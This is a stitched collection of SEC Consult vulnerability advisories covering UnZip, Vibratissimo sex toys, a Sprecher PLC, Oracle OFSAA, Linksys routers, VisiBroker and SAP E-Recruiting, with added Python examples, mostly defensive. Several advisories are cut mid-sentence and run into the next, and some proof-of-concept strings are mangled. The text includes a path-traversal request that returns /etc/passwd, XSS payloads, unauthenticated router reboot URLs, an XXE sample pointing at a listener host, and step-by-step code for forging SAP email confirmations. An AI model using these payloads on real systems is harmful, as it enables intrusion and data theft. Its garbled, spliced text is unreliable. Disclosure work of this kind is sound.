homepage: http://www.info-zip.org/UnZip.html
found: 2017-11-03
by: R. Freingruber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===

Vendor description:
---
"UnZip is an extraction utility for archives compressed in .zip format (also called "zipfiles"). Although highly compatible both with PKWARE's PKZIP and PKUNZIP utilities for MS-DOS and with Info-ZIP's own Zip program, our primary objectives have been portability and non-MSDOS functionality. UnZip will list, test, or extract files from a .zip archive, commonly found on MS-DOS systems. The default behavior (with no options) is to extract into the current directory (and subdirectories below it) all files from the specified zipfile."
Source: http://www.info-zip.org/UnZip.html

InfoZip's UnZip is used as the default utility for uncompressing ZIP archives on nearly all *nix systems. It is shipped with many commercial products on Windows to provide (un)compressing functionality as well.

Business recommendation:
InfoZip UnZip should be updated to the latest available version.

Vulnerability overview/description:
---
1) Heap-based buffer overflow in password protected ZIP archives (CVE-2018-135)
InfoZip's UnZip suffers from a heap-based buffer overflow when uncompressing password protected ZIP archives. An attacker can exploit this vulnerability to overwrite heap chunks to get arbitrary code execution on the target system.
For newer builds the risk for this vulnerability is partially mitigated because modern compilers automatically replace unsafe functions with length-checking variants of the same function (for example sprintf gets replaced by sprintf_chk). This is done by the compiler at locations where the length of the destination buffer can be calculated. Nevertheless, it must be mentioned that UnZip is used on many systems, including older systems or exotic architectures on which this protection is not in place. Moreover, pre-compiled binaries which can be found on the internet lack the protection because the last major release of InfoZip's UnZip was in 2009 and compilers didn't enable this protection per default at that time. The required compiler flags are also not set in the Makefile of UnZip. Compiled applications are therefore only protected if the used compiler has this protection enabled per default, which is only the case with modern compilers.

To trigger this vulnerability (and the following) it's enough to uncompress a manipulated ZIP archive. Any of the following invocations can be used to trigger and abuse the vulnerabilities:
>unzip malicious.zip
>unzip -p malicious.zip
>unzip -t malicious.zip

2) Heap-based out-of-bounds write (CVE-2018-131)
This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip). InfoZip's UnZip suffers from a heap-based out-of-bounds write if the archive filename does not contain a .zip suffix.

3) Heap/BSS-based buffer overflow (Bypass of CVE-2015-1315) (CVE-2018-132)
This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip). InfoZip's UnZip suffers from a heap/BSS-based buffer overflow which can be used to write null bytes out of bounds when converting attacker-controlled strings to the local charset.

4) Heap out-of-bounds access in ef_scan_for_stream (CVE-2018-133)
This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip). InfoZip's UnZip suffers from a heap out-of-bounds access vulnerability.
5) Multiple vulnerabilities in the LZMA compression algorithm (CVE-2018-134)
This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip). InfoZip's UnZip suffers from multiple vulnerabilities in the LZMA implementation. Various crash dumps have been supplied to the vendor but no further analysis has been performed.

Proof of concept:
-
1) Heap-based buffer overflow in password protected ZIP archives (CVE-2018-135)
Unzipping a malicious archive results in the following output:
(On Ubuntu 16.04 with UnZip 6.0 which was installed via aptitude install unzip)
SEC Consult SA-20180201-0 :: Multiple critical vulnerabilities in Whole Vibratissimo Smart Sex Toy product range
We have published an accompanying blog post to this technical advisory with further information:
https://www.sec-consult.com/en/blog/2018/02/internet-of-dildos-a-long-way-to-a-vibrant-future-from-iot-to-iod/index.html

SEC Consult Vulnerability Lab Security Advisory < 20180201-0 >
===
title: Multiple critical vulnerabilities
product: Whole Vibratissimo Smart Sex Toy product range
vulnerable version: <6.3 (iOS), <6.2.2 (Android), <2.0.2 (Firmware)
fixed version: 6.3 (iOS), 6.2.2 (Android), 2.0.2 (Firmware)
CVE number: -
impact: critical
homepage: http://www.vibratissimo.com
found: 2017-10-01
by: W. Schober (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===

Vendor description:
---
"Control with Vibratissimo your AMOR Toy on your smartphone and get even more features by the app. With Vibratissimo you are open to new and exciting opportunities, whether you are in the same room or on different continents."
Source: http://www.vibratissimo.com/en/index.html

Business recommendation:
SEC Consult highly recommends updating the app to the newest version available in the app store. Furthermore the password which was used within the app should be changed immediately. If the password was used for multiple services, all passwords should be changed. To get rid of issue number 3 (Unauthenticated Bluetooth LE Connections) a firmware update can be applied. To apply the firmware update the devices have to be sent to Amor Gummiwaren GmbH.

Vulnerability overview/description:
---
1) Customer Database Credential Disclosure
The credentials for the whole Vibratissimo database environment were exposed on the internet. Due to the fact that the PHPMyAdmin interface was exposed as well, an attacker could have been able to connect to the database and dump the whole data set.
The dataset contains for example the following data:
- Usernames
- Session Tokens
- Cleartext passwords
- chat histories
- explicit image galleries, which are created by the users themselves

2) Exposed administrative interfaces on the internet
An administrative interface for databases was available without any filtering to the whole internet. In combination with other vulnerabilities an attacker could have been able to get access to the whole database data and even take over the server.

3) Cleartext Storage of Passwords
The user passwords were stored unhashed in cleartext in the database. If an attacker gained access to the database (e.g. via credential disclosure), he could have been able to retrieve the plaintext passwords of users and abuse their privileges in the system.

4) Unauthenticated Bluetooth LE Connections
The sex toys are connected without prior authentication to the app, which is the standard use case. For example one of the identified Bluetooth services allows reading the current device temperature. Other services which can be accessed without prior authentication are:
-) Setting the "intensity" of the current vibration pattern
-) Reading various values (Temperature, etc)

5) Insufficient Authentication Mechanism
The Android application is using a type of authentication which is against known best practice. The username and password are sent with every request to the server to authenticate and authorise the request. There is no session management implemented. However, the authentication credentials are transmitted via an encrypted SSL/TLS connection.

6) Insecure Direct Object Reference
Due to flaws in the authorization schema, an authorization bypass vulnerability allows an attacker to get access to restricted functions and resources. In this case a user is able to set a profile picture by uploading a provided image. The image is stored on the Vibratissimo server and renamed.
All images are renamed by incrementing a global number and assigning this number as the name of the image (e.g. 200.png). An attacker is now able to iterate through those images and dump personal user images containing partially explicit content. The image can even be accessed if the profile has been set to "hidden" by the user.

7) Missing Authentication in Remote Control
The mobile apps allow their users to use a feature called quick control. This feature allows sending a link with a unique ID to an email address or a telephone via SMS to get direct control of the sex toy over the internet. This wouldn't be a problem in gener
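Issue 6 combines two defects: object names that are a global counter, and a fetch path that never consults the owner's "hidden" setting. The following is an added example, not Vibratissimo code, that models both the described storage scheme and a variant with opaque names and an authorization decision on every fetch. The class names, the profile model and the image bytes are constructed.

```python
"""Profile-image storage: the sequential naming described in the advisory
(a global counter, e.g. 200.png, served to any user) beside a variant that uses
unguessable names and enforces the owner's visibility setting.
Added example, not Vibratissimo code; every name here is hypothetical."""
import secrets
from dataclasses import dataclass
from typing import Optional


@dataclass
class Profile:
    username: str
    hidden: bool = False            # the "hidden" setting mentioned in the advisory
    image_name: Optional[str] = None


class SequentialImageStore:
    """Models the flaw: images are named by a global counter and fetched by name
    with no authorization check, so the whole gallery is enumerable."""

    def __init__(self):
        self._counter = 199
        self._images = {}           # "200.png" -> bytes

    def upload(self, profile: Profile, data: bytes) -> str:
        self._counter += 1
        name = f"{self._counter}.png"
        self._images[name] = data
        profile.image_name = name
        return name

    def fetch(self, requester: Profile, name: str) -> bytes:
        return self._images[name]   # any logged-in user, any name


class AuthorizedImageStore:
    """Opaque 128-bit names plus an authorization decision on every fetch."""

    def __init__(self):
        self._images = {}           # name -> (owner Profile, bytes)

    def upload(self, profile: Profile, data: bytes) -> str:
        name = secrets.token_urlsafe(16) + ".png"   # not derivable from other names
        self._images[name] = (profile, data)
        profile.image_name = name
        return name

    def fetch(self, requester: Profile, name: str) -> bytes:
        entry = self._images.get(name)
        # Same error for "missing" and "not permitted" so a caller cannot
        # distinguish the two (avoids confirming that an object exists).
        if entry is None:
            raise PermissionError("not found or not permitted")
        owner, data = entry
        if owner is not requester and owner.hidden:
            raise PermissionError("not found or not permitted")
        return data


def hidden_image_readable_by_stranger(store_cls) -> bool:
    """Upload an image for a hidden profile and try to fetch it as another user."""
    store = store_cls()
    alice = Profile("alice", hidden=True)
    mallory = Profile("mallory")
    name = store.upload(alice, b"constructed image bytes")
    try:
        store.fetch(mallory, name)
        return True
    except PermissionError:
        return False


def owner_can_read_own_image(store_cls) -> bool:
    store = store_cls()
    alice = Profile("alice", hidden=True)
    name = store.upload(alice, b"constructed image bytes")
    return store.fetch(alice, name) == b"constructed image bytes"


def names_are_predictable(store_cls) -> bool:
    """Do two consecutive uploads produce consecutive numeric names?"""
    store = store_cls()
    a = store.upload(Profile("u1"), b"a")
    b = store.upload(Profile("u2"), b"b")
    try:
        return int(b.split(".")[0]) == int(a.split(".")[0]) + 1
    except ValueError:
        return False
```

Unguessable names alone would not have been enough here: the advisory notes the image is served even for hidden profiles, so the fetch path must check ownership and visibility regardless of how the name was obtained.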
SEC Consult SA-20180131-0 :: Multiple Vulnerabilities in Sprecher Automation SPRECON-E-C, PU-2433
SEC Consult Vulnerability Lab Security Advisory < 20180131-0 >
===
title: Multiple Vulnerabilities
product: Sprecher Automation SPRECON-E-C, PU-2433
vulnerable version: <8.49 (most vulnerabilities, see "Vulnerable version" for details)
fixed version: 8.49 (most vulnerabilities, see "Solution" for details)
CVE number: -
impact: Medium
homepage: https://www.sprecher-automation.com
found: 2017-08-15
by: T. Weber, C.A. (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===

Vendor description:
---
"Sprecher Automation GmbH offers switchgears and automation solutions for energy, industry and infrastructure processes. Our customers are power utilities, industries, transportation companies, municipal utilities and public institutions. Company-own developments and cooperations with technology partners lead to a unique product portfolio consisting of traditional electrical technologies as well as high-tech electronics."
Source: https://www.sprecher-automation.com/en/

Business recommendation:
SEC Consult recommends to immediately patch the systems and follow the hardening guide provided by the vendor (SEC Consult did not have access to the hardening guide in order to review it). A thorough security review should be performed by security professionals as further security issues might exist within the product.

Vulnerability overview/description:
---
1) Authenticated Path Traversal Vulnerability
The web interface of the Sprecher PLC suffers from a path traversal vulnerability. A user who is authenticated on the web interface, which is intended as a read-only interface, can download files with the permissions of the webserver (www-data). Files like "/etc/shadow" are not readable for the webserver.
2) Client-Side Password Hashing
The password hashes which are stored on the system can be directly used to authenticate on the web interface (pass-the-hash) since the password is hashed in the browser of the user during login.

3) Missing Authentication
The PLC exposes a Telnet management service on TCP port 2048. This interface can be used to control the PLC and does not require any authentication.

4) Permanent Denial of Service via Portscan
An aggressive TCP SYN scan on a large amount of ports triggers a denial of service of the PLC service. This results in a persistent DoS of the standby PLC in an active-standby pair. Manual operator intervention is required to restore service availability.

5) Outdated Linux Kernel
An ancient Linux kernel version with a high number of known security weaknesses is used for the PLC base operating system.

Proof of concept:
-
1) Authenticated Path Traversal Vulnerability
Reading "passwd" is possible by triggering the following request:
---
GET /webserver/cgi-bin/spre.cgi?4_1=../../../../../../../etc/passwd HTTP/1.1
Host:
Cookie: sid=
Connection: close
Upgrade-Insecure-Requests: 1
---
The file is directly fetched from the system:
---
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
haldaemon:x:68:68:hald:/:/bin/sh
dbus:x:81:81:dbus:/var/run/dbus:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
sshd:x:103:99:Operator:/var:/bin/sh
[...]
---

2) Client-Side Password Hashing
The passwords are hashed in JavaScript before they are transmitted to the device. Therefore the hash is as good as the password.
The following request shows a login process:
---
POST /webserver/cgi-bin/spre.cgi HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Referer: http:///We
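Issue 2 above ("the hash is as good as the password") comes down to what the server actually compares. The following is an added example, not Sprecher code, that puts the described scheme (the browser submits a hash and the device compares it against the stored hash) next to server-side verification with a salted, iterated hash. The advisory does not name the hash algorithm the device uses; SHA-256 for the weak scheme and PBKDF2-HMAC-SHA256 with an assumed work factor for the hardened one are illustration choices.

```python
"""Why hashing the password in the browser makes the stored verifier equivalent
to the password (pass-the-hash), and what server-side verification looks like.
Added example, not Sprecher code; the algorithms and work factor are assumed."""
import hashlib
import hmac
import os
from typing import Optional

# --- Scheme described in the advisory: the browser sends H(password) and the
# --- device compares it with the stored H(password). The stored value is
# --- therefore a reusable credential, not just a verifier.
def weak_enroll(password: str) -> str:
    return hashlib.sha256(password.encode()).hexdigest()


def weak_login(stored_hash: str, submitted_hash: str) -> bool:
    """Whoever holds `stored_hash` (e.g. from a leaked config) can log in."""
    return hmac.compare_digest(stored_hash, submitted_hash)


# --- Server-side verification: the password itself travels over TLS and is
# --- checked against a salted, iterated hash that cannot be replayed.
PBKDF2_ITERATIONS = 600_000     # assumed work factor


def hardened_enroll(password: str, salt: Optional[bytes] = None) -> dict:
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return {"salt": salt, "digest": digest, "iterations": PBKDF2_ITERATIONS}


def hardened_login(record: dict, submitted_password: str) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", submitted_password.encode(),
                                    record["salt"], record["iterations"])
    return hmac.compare_digest(record["digest"], candidate)


def pass_the_hash_works(scheme: str) -> bool:
    """Can someone who knows only the stored verifier authenticate?"""
    password = "correct horse battery staple"   # constructed
    if scheme == "client-side":
        stored = weak_enroll(password)
        return weak_login(stored, stored)         # replaying the hash suffices
    record = hardened_enroll(password)
    leaked = record["digest"].hex()
    return hardened_login(record, leaked)         # the verifier is not the password
```

Hashing in the browser does nothing that TLS is not already doing for the transport, and it moves the secret the server compares from "the password" to "the hash", which is exactly what a leaked configuration file then contains. If client-side hashing is kept for some reason, the server still has to hash the received value again with a salt before comparing.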
SEC Consult SA-20180123-0 :: XXE & Reflected XSS in Oracle Financial Services Analytical Applications
SEC Consult Vulnerability Lab Security Advisory < 20180123-0 >
===
title: XXE & Reflected XSS
product: Oracle Financial Services Analytical Applications
vulnerable version: 7.3.5.x, 8.0.x
fixed version: Oracle CPU January 2018
CVE number: CVE-2018-2660, CVE-2018-2661
impact: High
homepage: http://www.oracle.com/us/products/applications/financial-services/analytical-applications/index.html
found: 2017-06-15
by: Mohammad Shah Bin Mohammad Esa, Samandeep Singh (Office Singapore)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===

Vendor description:
---
"Oracle is the unchallenged leader in Financial Services, with an integrated, best-in-class, end-to-end solution of intelligent software and powerful hardware designed to meet every financial service need."
Source: http://www.oracle.com/us/products/applications/financial-services/analytical-applications/index.html

Business recommendation:
By exploiting the XXE vulnerability, an attacker can get read access to the filesystem of the user's system using the OFSAA web application and thus obtain sensitive information from the system. It is also possible to bypass input validation checks in order to inject JavaScript code. SEC Consult recommends to immediately install the patched version. Furthermore, a thorough security review should be performed by security professionals to identify potential further security issues.

Vulnerability overview/description:
---
1) XML eXternal Entity (XXE) Injection (CVE-2018-2660)
The web application allows users to import XML files. An attacker can import a specially crafted XML file and exploit the XXE vulnerability within the application.
2) Reflected Cross Site Scripting (CVE-2018-2661)
This vulnerability allows an unauthenticated user to inject malicious client-side script which will be executed in the browser of a user if he visits the manipulated URL.

Proof of concept:
-
1) XML External Entity Injection (XXE) (CVE-2018-2660)
For example, by importing the following XML code in the "Business Model Upload" function a connection request from the server to the attacker's system will be made.
http://[IP:port]/; >]>
IP:port = IP address and port where the attacker is listening for connections

Furthermore some files can be exfiltrated to remote servers via the techniques described in:
https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf

2) Reflected Cross Site Scripting (CVE-2018-2661)
The following parameters have been found to be vulnerable to reflected cross site scripting attacks. Furthermore, there are many more vulnerable parameters. The following payload shows a simple alert message box:

URL : http://$DOMAIN/OFSAA/admin/PopupAlert_H5.jsp?winTitle=
METHOD : GET
PAYLOAD : winTitle=a%3C/title%3E%3Cimg%0A%20src=x%20onerror=%22prompt%0A%28%27SEC%20consult%20-%20XSS%27%29%22%3E

URL : http://$DOMAIN/OFSAA/fsapps/common/MM_PageOpener_crossBrowser.jsp?url=fetchErrorMessages.action=OCBCOFSAASG=summarypage={62}~
METHOD : GET
PAYLOAD : errorMessage={62}~%27;alert%0a(0);//=DeleteConfirm

Vulnerable / tested versions:
-
The following version has been tested, which was the most recent one when the vulnerabilities were discovered:
* Oracle Financial Services Analytical Applications 8.0.4.0.0
According to Oracle all versions 7.3.5.x and 8.0.x are affected before CPU January 2018.
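The XXE issue above exists because the import accepts a document type declaration and resolves the entities it declares. An upload endpoint that does not need a DTD at all can refuse any document carrying one before the real parser ever sees it. The following is an added example, not OFSAA code, that does this with Python's stdlib expat as a pre-pass and then parses with ElementTree; the two sample documents are constructed, and the listener host in the second is a placeholder.

```python
"""Rejecting DTDs and entity declarations before an untrusted XML import is
parsed, which closes the XXE class described above. Added example, not OFSAA
code; the sample documents are constructed."""
import xml.etree.ElementTree as ET
from xml.parsers import expat


class UnsafeXML(ValueError):
    """Raised when an upload carries a DOCTYPE or any entity declaration."""


def reject_dtd(data: bytes) -> None:
    """First pass with expat: abort on the first DOCTYPE/ENTITY construct."""
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE for {name!r} not allowed in uploads")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXML(f"entity declaration {name!r} not allowed in uploads")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(data, True)            # exceptions raised in handlers propagate


def parse_upload(data: bytes) -> ET.Element:
    """Parse an uploaded business model only after the DTD check passed."""
    reject_dtd(data)
    return ET.fromstring(data)


def is_safe_upload(data: bytes) -> bool:
    try:
        reject_dtd(data)
        return True
    except UnsafeXML:
        return False


# Constructed samples: a benign model and one declaring an external entity.
BENIGN_MODEL = b"""<?xml version="1.0"?>
<businessModel name="demo"><entity name="Customer"/></businessModel>"""

XXE_MODEL = b"""<?xml version="1.0"?>
<!DOCTYPE businessModel [
  <!ENTITY ext SYSTEM "http://listener.example.invalid/">
]>
<businessModel name="demo">&ext;</businessModel>"""
```

The pre-pass is deliberately stricter than "do not resolve external entities": it also rules out internal-entity expansion attacks and parameter entities, and it fails closed on malformed input because expat raises on that too. Recent Python versions already refrain from fetching external general entities by default, but an explicit rejection does not depend on the parser library's defaults, which is the property you want at a trust boundary.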
Vendor contact timeline:
2017-09-11: Contacting vendor through encrypted email (secalert...@oracle.com)
2017-09-20: Vendor requested to postpone the release date
2018-01-13: Vendor informed that the Critical Patch Update that includes fixes for the reported issues will be released on 2018-01-16. CVE-2018-2660 & CVE-2018-2661 were assigned for the issues
2018-01-23: Public disclosure of advisory

Solution:
-
Apply the patch update in the January 2018 Critical Patch Update:
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html

Workaround:
---
None

Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin
SEC Consult SA-20171018-1 :: Multiple vulnerabilities in Linksys E-series products
SEC Consult Vulnerability Lab Security Advisory < 20171018-1 >
===
title: Multiple vulnerabilities
product: Linksys E series, see "Vulnerable / tested versions"
vulnerable version: see "Vulnerable / tested versions"
fixed version: no public fix, see solution/timeline
CVE number: -
impact: high
homepage: http://www.linksys.com/
found: 2017-06-26
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===

Vendor description:
---
"Today, Belkin International has three brands – Belkin, Linksys and WeMo – to enhance the technology that connects us to the people, activities and experiences we love. Belkin products are renowned for their simplicity and ease of use, while our Linksys brand helped make wireless connectivity mainstream around the globe. Our newest brand, WeMo, is the leader in delivering customizable smart home experiences. Its product platform empowers people to monitor, measure and manage their electronics, appliances and lighting at home and on-the-go."
Source: http://www.belkin.com/uk/aboutUs/

Business recommendation:
SEC Consult recommends not to use this product in a production environment until a thorough security review has been performed by security professionals and all identified issues have been resolved.

Vulnerability overview/description:
---
1) Denial of Service (DoS)
A denial of service vulnerability is present in the web server of the device. This vulnerability is very simple to trigger since a single GET request to a cgi-script is sufficient. A crafted GET request, e.g. triggered by CSRF via a user in the internal network, can reboot the whole device or freeze the web interface and the DHCP service. This action does not require authentication.
2) HTTP Header Injection & Open Redirect
Due to a flaw in the web service a header injection can be triggered without authentication. This kind of vulnerability can be used to perform different arbitrary actions. One example in this case is an open redirection to another web site. In the worst case a session ID of an authenticated user can be stolen this way because the session ID is embedded into the URL, which is another flaw of the web service.

3) Improper Session-Protection
The session ID for administrative users can be fetched from the device from the LAN without credentials because of insecure session handling. This vulnerability can only be exploited when an administrator was authenticated to the device before the attack and opened a session previously. The login works if the attacker has the same IP address as the PC of the legitimate administrator. Therefore, a CSRF attack is possible when the administrator is lured to surf on a malicious web site or to click on a malicious link.

4) Cross-Site Request Forgery Vulnerability in Admin Interface
A cross-site request forgery vulnerability can be triggered in the administrative interface. This vulnerability can be exploited because the session ID can be hijacked by using 3) via LAN. An exploitation via internet is only possible if the session ID is exposed to the internet (for example via the referrer). An attacker can change any configuration of the device by luring a user to click on a malicious link or surf to a malicious web site.

5) Cross-Site Scripting Vulnerability in Admin Interface
A cross-site scripting vulnerability can be triggered in the administrative interface. This vulnerability can be exploited because the session ID can be hijacked by using 3) via LAN. An exploitation via internet is only possible if the session ID is exposed to the internet (for example via the referrer). By using this vulnerability, malicious code can be executed in the context of the browser session of the attacked user.
Proof of concept:
-
1) Denial of Service
Unauthenticated request for triggering a router reboot in browser:
http:///upgrade.cgi
http:///restore.cgi
Unauthenticated request for triggering a router freeze in browser:
http:///mfgtst.cgi

2) HTTP Header Injection & Open Redirect
A header injection can be triggered by the following unauthenticated request:
Request:
--
POST /UnsecuredEnable.cgi HTTP/1.1
Host:
Accept: */*
Accept-Language: en
Connection: close
Referer: http:///Unsecured.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
SEC Consult SA-20171016-0 :: Multiple vulnerabilities in Micro Focus VisiBroker C++
SEC Consult Vulnerability Lab Security Advisory < 20171016-0 >
===
title: Multiple vulnerabilities
product: Micro Focus VisiBroker C++
vulnerable version: 8.5 SP2
fixed version: 8.5 SP4 HF3
CVE number: CVE-2017-9281, CVE-2017-9282, CVE-2017-9283
impact: High
homepage: https://www.microfocus.com/products/corba/visibroker/
found: 2017-04
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===

Vendor description:
---
"VisiBroker(TM) is a comprehensive CORBA environment for developing, deploying, and managing distributed applications. Built on open industry standards and a high-performance architecture, VisiBroker is especially suited to low-latency, complex, data-oriented, transaction-intensive, mission-critical environments. Using VisiBroker(R), organizations can develop, connect, and deploy complex distributed applications that have to meet very high performance and reliability standards. With more than 30 million licenses in use, VisiBroker is the world’s most widely deployed CORBA Object Request Broker (ORB) infrastructure."
URL: https://www.microfocus.com/products/corba/visibroker/

Business recommendation:
During a superficial fuzzing test, SEC Consult found several memory corruption vulnerabilities that allow denial of service attacks or potentially arbitrary code execution. Although the fuzzing test only had a very limited coverage, several vulnerabilities have been identified. Assuming the code quality is homogeneous, it is possible that other parts of the application exhibit similar issues. SEC Consult did not attempt to fully evaluate the potential impact of the identified vulnerabilities. SEC Consult recommends to decommission any VisiBroker C++ component that communicates with untrusted entities until a full security audit has been performed.
Moreover, SEC Consult recommends to restrict network access to all CORBA services that utilize the VisiBroker C++ environment.

Vulnerability overview/description:
---
1) Integer Overflow / Out of Bounds Read (Denial of Service) [CVE-2017-9281]
By specifying a large value for a length field, an integer overflow occurs. As a result, the application reads memory until a non-mapped memory region is reached. This causes the application to encounter a segmentation fault.

2) Integer Overflow (Heap Overwrite) [CVE-2017-9282]
By specifying a manipulated value for a length field an attacker can cause an integer overflow. This causes the application to allocate too little memory. When the application attempts to write to this memory buffer, heap memory is overwritten, leading to denial of service or potentially arbitrary code execution.

3) Out of Bounds Read [CVE-2017-9283]
By specifying a manipulated value for a length field, an attacker can cause the application to read past an allocated memory region.

4) Use after Free
SEC Consult found that the application under certain circumstances tries to access a memory region that has been deallocated before. It is unclear whether Micro Focus fixed the root cause of this behaviour. As the vendor was unable to reproduce the vulnerability in the current version, Micro Focus believes that the vulnerability was fixed with a previous update. Since SEC Consult is unsure whether Micro Focus found the root cause of the vulnerability, we refrain from releasing proof of concept code.

Proof of concept:
-
A service implementing the following IDL was used to identify the vulnerabilities listed here:
module Bank {
  interface Account {
    float balance(in string test);
  };
  interface AccountManager {
    Account open(in string name);
  };
};
The implemented service was based on the Visibroker example project "bank_agent".
1) Integer Overflow / Out of Bounds Read (Denial of Service) The method CORBA_MarshalOutBuffer *__cdecl CORBA_MarshalOutBuffer::put( CORBA_MarshalOutBuffer *this, const char *src, unsigned int size) is used to copy/append a char[] into a buffer. If the size of the data that is stored in the buffer plus the size of the char[] to be appended exceeds the allocated size, the method reallocates the buffer. By choosing the size of the char[] as e.g. 0x (on 32 bit systems) an integer overflow can be caused. The method then continues without allocating additional memory. However, the application then expects that the source buffer contains 0x bytes o
SEC Consult SA-20170912-0 :: Email verification bypass in SAP E-Recruiting
SEC Consult Vulnerability Lab Security Advisory < 20170912-0 >
===
title: Email verification bypass
product: SAP E-Recruiting
vulnerable version: 605, 606, 616, 617
fixed version: see SAP security note number 2507798
impact: medium
homepage: https://www.sap.com
found: 2017-07-12
by: Marc Nimmerrichter (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"SAP E-Recruiting" has recruitment and succession planning instruments that will help your company find new employees, employ them in positions that suit their capabilities, promote their professional development, and retain them in the long term. As well as enabling you to handle your company's applicant tracking activities, "SAP E-Recruiting" ensures that you drive up-to-date human resources management, by proactively maintaining contact with applicants, potential candidates, and consequently, with your employees.
Source: https://help.sap.com/saphelp_erp60_sp/helpdata/en/73/8bcf535b804808e1000a174cb4/frameset.htm
Business recommendation:
Email address verification during applicant registration can be bypassed. Businesses using the vulnerable component are advised to estimate the impact of insufficient email address verification on their business processes and react accordingly. It is recommended to install a patched version as soon as possible.
Vulnerability overview/description:
---
When an external applicant registers with the E-Recruiting application, he/she receives a link by email to confirm access to the provided email address. However, this measure can be bypassed and attackers can register and confirm email addresses that they do not have access to. This can have a business impact, because business processes might rely on a verified email address.
Furthermore, since an email address can be registered only once, an attacker could prevent other legitimate users from registering with the E-Recruiting application.
Proof of concept:
-
The email verification link contains the "param" HTTP GET parameter with base64 encoded data. When decoded, this data contains the parameters "candidate_hrobject" and "corr_act_guid". candidate_hrobject is an incremental user ID. corr_act_guid is a random value that needs to be provided during the email verification. However, this value is not bound to the current registration, which means that the value of a previous registration can be reused. Since candidate_hrobject is incremental, it can be guessed by an attacker.
An attacker who wants to register with an email address not belonging to him/her can simply do the following:
1. Register with his own email address
2. Directly afterwards register with someone else's email address
3. Read the current value of candidate_hrobject in the confirmation link from the first registration
4. Increment this value by 1
5. Send the new value in the HTTP GET request, using the corr_act_guid parameter from the first registration
6. If this did not work: go back to step 4 to try the next ID (other people may have registered in between the two registrations)
This attack works because there is no per-registration nonce in the confirmation link: the server only checks that corr_act_guid was issued at some point, not that it was issued for the candidate_hrobject it is presented with.
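The six steps above, modelled end to end as an added example (this is not SAP code and not part of the original advisory): the attacker's own confirmation link is decoded, candidate_hrobject is incremented while corr_act_guid is reused, and the forged links are replayed against two toy verifiers. The inner layout of the base64 "param" blob is not given in the advisory; a query-string layout is assumed here. VulnerableRegistry accepts any GUID it ever issued (the advisory's behaviour); FixedRegistry binds the GUID to the registration it was issued for, which is the missing per-registration nonce.

```python
import base64
import hmac
import secrets
from urllib.parse import parse_qs, urlencode


def encode_param(candidate_hrobject, corr_act_guid):
    # Assumption: "param" is base64 over a query-string-like payload.
    raw = urlencode({"candidate_hrobject": candidate_hrobject,
                     "corr_act_guid": corr_act_guid}).encode()
    return base64.b64encode(raw).decode()


def decode_param(param):
    qs = parse_qs(base64.b64decode(param).decode())
    return {k: v[0] for k, v in qs.items()}


def forged_params(own_param, tries=5):
    """Steps 3-6: keep our corr_act_guid, walk candidate_hrobject upwards."""
    own = decode_param(own_param)
    base_id = int(own["candidate_hrobject"])
    return [encode_param(base_id + i, own["corr_act_guid"]) for i in range(1, tries + 1)]


class VulnerableRegistry:
    """GUID is accepted if it was issued to anyone (advisory behaviour)."""
    def __init__(self):
        self.issued_guids = set()
        self.confirmed = set()

    def register(self, candidate_id):
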